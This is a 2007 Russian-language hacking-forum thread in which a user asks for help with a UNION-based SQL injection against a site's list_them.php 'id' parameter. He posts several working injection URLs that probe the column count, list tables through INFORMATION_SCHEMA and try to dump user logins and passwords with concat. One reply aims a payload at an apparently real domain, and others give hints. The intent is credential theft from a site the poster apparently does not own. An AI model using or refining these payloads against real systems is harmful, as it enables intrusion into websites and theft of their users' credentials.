Не могу вывести данные через SQL-injection
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Не могу вывести данные через SQL-injection - 2007-05-14 14:25:49.690000
|
|
|
fastnull
Сообщений: 11
Оценки: 0
Присоединился: 2007-05-06 16:08:34.880000
|
Я узнал названия колонок в таблиц users: u_id , u_name , u_family, u_login , u_pass , u_mail , u_site , u_icq , u_age , u_pol, u_country , u_city , u_log_or_nm , u_type ,
u_date_reg , u_ban , u_voting
Ввёл запрос
http://site.ru/list_them.php?id=-1+union+select+u_id,u_name,u_family,u_login,u_pass,u_mail,u_site,u_icq,u_age,u_pol,u_country,u_city,u_log_or_nm,u_type,u_date_reg,u_ban,u_voting+from+users+limit+0,1/*
Вводил также
http://site.ru/list_them.php?id=-1+union+select+1,2,3,4,5,u_login,7,8,9,10,11+from+users+where+u_id='1'+limit+1,1/*
MySQL всё время прописывал ошибку, скажите пожалуйста, как вывести данные из этих столбцов?
|
|
|
|
|
RE: Не могу вывести данные через SQL-injection - 2007-05-14 15:48:51.143333
|
|
|
denispoc
Сообщений: 55
Оценки: 0
Присоединился: 2007-03-12 15:14:27.080000
|
А количество столбцов правильно подобрал? Чет я не вижу
|
|
|
|
|
RE: Не могу вывести данные через SQL-injection - 2007-05-14 16:41:57.896666
|
|
|
fastnull
Сообщений: 11
Оценки: 0
Присоединился: 2007-05-06 16:08:34.880000
|
Вот сама скуля
http://site.ru/list_them.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
При запросе
http://site.ru/list_them.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11+from+INFORMATION_SCHEMA.tables
Появляется название таблицы CHARACTER_SETS
Вводил также:
http://site.ru/list_them.php?id=-1+union+select+1,2,3,4,5,concat(u_login,0x3a,u_pass),7,8,9,10,11+from+users+limit+1,1/*
Всё попусту
11 полей в таблице CHARACTER_SETS, а в таблице users 17 полей
Я её и так и сяк, ну никак не получается :)
|
|
|
|
|
RE: Не могу вывести данные через SQL-injection - 2007-05-14 16:46:54.713333
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
Вот держи, можешь не благодарить http://bankreferatov-5ballov.ru/list_them.php?id=-1+union+select+1,2,char(103,111,111,103,108,101,32,240,243,235,232,242,32,33,33,33,33),4,5,6,7,8,9,10,11/*
|
|
|
|
|
RE: Не могу вывести данные через SQL-injection - 2007-05-14 16:50:56.510000
|
|
|
fastnull
Сообщений: 11
Оценки: 0
Присоединился: 2007-05-06 16:08:34.880000
|
quote:
ORIGINAL: blonx
Вот держи, можешь не благодарить http://site.ru/list_them.php?id=-1+union+select+1,2,char(103,111,111,103,108,101,32,240,243,235,232,242,32,33,33,33,33),4,5,6,7,8,9,10,11/*
Высвечивается google рулит !!!!, очень смешно!:D
|
|
|
|
|
RE: Не могу вывести данные через SQL-injection - 2007-05-14 16:55:16.670000
|
|
|
blonx
Сообщений: 1150
Оценки: 0
Присоединился: 2006-04-01 03:28:42
|
А это тебе ни о чем не говорит?
|
|
|
|
|
RE: Не могу вывести данные через SQL-injection - 2007-05-15 05:07:04.863333
|
|
|
fastnull
Сообщений: 11
Оценки: 0
Присоединился: 2007-05-06 16:08:34.880000
|
Нет не говорит, иначе бы я не обратился за помощью!
|
|
|
|
|
RE: Не могу вывести данные через SQL-injection - 2007-05-15 05:33:45.780000
|
|
|
fastnull
Сообщений: 11
Оценки: 0
Присоединился: 2007-05-06 16:08:34.880000
|
Возможно ли, что моему пользователю может бы запрещён доступ к таблице users?
|
|
|
|
|
|
